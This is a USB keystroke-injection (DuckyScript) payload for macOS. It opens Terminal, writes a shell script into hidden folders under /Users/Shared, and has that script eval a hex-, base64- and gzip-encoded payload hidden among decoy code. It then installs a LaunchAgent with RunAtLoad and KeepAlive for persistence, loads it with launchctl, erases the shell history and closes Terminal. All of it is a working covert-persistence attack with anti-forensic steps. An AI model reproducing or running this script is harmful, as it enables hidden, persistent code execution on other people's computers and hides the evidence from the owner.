DELAY 1000
GUI SPACE
STRING Terminal
DELAY 500
ENTER
DELAY 500
STRING cd ..
ENTER
DELAY 500
STRING cd Shared
ENTER
STRING mkdir .harrypotter
ENTER
STRING cd .harrypotter
ENTER
STRING mkdir .sorry
ENTER
STRING cd .sorry
ENTER
STRING nano i.sh
ENTER
DELAY 1000
STRING #!/bin/bash
ENTER
STRING jfdkjgkhdj="(=<`#9]~6ZY32Vx/4Rs+0No-&Jk)"Fh}|Bcy?`=*z]Kw%oG4UUS0/@-ejc(:'8dc0a"
ENTER
STRING f(){ l=$1;
ENTER
STRING c='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; r='';
ENTER
STRING for((i=0;i<l;i++)); do r+=${c:$((RANDOM%${#c})):1}; done; echo "$r";}
ENTER
STRING e(){ s="$1"; r=''; for((i=0;i<${#s};i++)); do c="${s:$i:1}"; ec=$(printf
ENTER
STRING '%d' "'$c"); r+="$ec "; done; echo "$r";}
ENTER
STRING d(){ es="$1"; ds=''; ecs=($es); for ec in "${ecs[@]}"; do dc=$(printf
ENTER
STRING "\x$(printf %x $ec)"); ds+="$dc"; done; echo "$ds";}
ENTER
STRING m(){ while true; do cu=$(top -bn1 | grep "Cpu(s)" | awk '{print $2 +
ENTER
STRING $4"%"}'); mu=$(free -m | awk 'NR==2{printf "%.2f%%\n", $3*100/$2}'); echo
ENTER
STRING "CPU Usage: $cu, Memory Usage: $mu"; sleep 1; done;}
ENTER
STRING a6fHFf8j3="4834734943437759546d594141326b7563326741553162555438724d3030
ENTER
STRING 394b4c4d3767796939497a56505154565149546b784c4c4d726b34674941
ENTER
STRING 2f69385a716877414141413d0a"
ENTER
STRING a6fHFf8j3="4834734943504d7a5547594141326b756332674146597042436f41674641
ENTER
STRING 58332f785176416e663546584956654a664d44776c526b6c62585477646d
ENTER
STRING 4d3877346345676e68375873524e2b65446b473948316b514c774a367870
ENTER
STRING 546746546a4b7933584c62493232585730647a7730597232783779794753
ENTER
STRING 34517a463678516f2b674657785850735767414141413d3d0a
ENTER
STRING a2fj2o3ijf="38947509183475098731409857039485702983475
ENTER
STRING 234570237548023974598273450a"
ENTER
STRING eval "$(echo $a6fHFf8j3 | xxd -r -p | base64 --decode | gunzip)"
ENTER
STRING f(){
ENTER
STRING l=$1;c='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';r='';for((i=0;i<l;i++));do
ENTER
STRING r+=${c:$((RANDOM%${#c})):1};done;echo "$r";}
ENTER
STRING e2(){ s="$1";r='';for((i=0;i<${#s};i++));do c="${s:$i:1}";ec=$(printf '%d'
ENTER
STRING "'$c");r+="$ec ";done;echo "$r";}
ENTER
STRING d1(){ es="$1";ds='';ecs=($es);for ec in "${ecs[@]}";do dc=$(printf
ENTER
STRING "\x$(printf %x $ec)");ds+="$dc";done;echo "$ds";}
ENTER
STRING m(){ while true;do cu=$(top -bn1|grep "Cpu(s)"|awk '{print $2 +
ENTER
STRING $4"%"}');mu=$(free -m|awk 'NR==2{printf "%.2f%%\n", $3*100/$2}');echo "CPU
ENTER
STRING Usage: $cu, Memory Usage: $mu";sleep 1;done;}
ENTER
STRING #e2 "Encryption and decryption are complex tasks"|d
ENTER
STRING ajksdhf="h82f9o24hf2487hfo287hfo8247hfo2874hfh;aksdjf;klasjf
ENTER
STRING 2fh94hf2794hf274hf2h8p4fhh29p48hfp298hf2984hf
ENTER
STRING hhfp24f98h928hf4p98h29hf240a"
ENTER
DELAY 500
CTRL X
DELAY 500
STRING Y
DELAY 500
ENTER


STRING nano ii.plist
ENTER
DELAY 1000
STRING <?xml version="1.0" encoding="UTF-8"?>
ENTER
STRING <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
ENTER
STRING <plist version="1.0">
ENTER
STRING <dict>
ENTER
STRING     <key>Label</key>
ENTER
STRING     <string>/Users/Shared/.harrypotter/.sorry/i.sh</string>
ENTER
STRING     <key>ProgramArguments</key>
ENTER
STRING     <array>
ENTER
STRING         <string></string>
ENTER
STRING     </array>
ENTER
STRING     <key>RunAtLoad</key>
ENTER
STRING     <true/>
ENTER
STRING     <key>KeepAlive</key>
ENTER
STRING     <true/>
ENTER
STRING </dict>
ENTER
STRING </plist>
ENTER
CTRL X
DELAY 500
STRING Y
DELAY 500
ENTER


REM Move the ii.sh file and load it with launchctl
DELAY 500
STRING mv /Users/Shared/.harrypotter/.sorry/ii.plist $HOME/Library/LaunchAgents/
ENTER
DELAY 100
STRING launchctl load $HOME/Library/LaunchAgents/ii.plist
ENTER

REM Clear the history
DELAY 100
STRING history -c
ENTER
STRING history -w
ENTER
STRING rm -f $HOME/.bash_history
ENTER
STRING unset HISTFILE
ENTER

REM Close the Terminal
STRING osascript -e 'tell application "Terminal" to quit'
ENTER
DELAY 500
ENTER
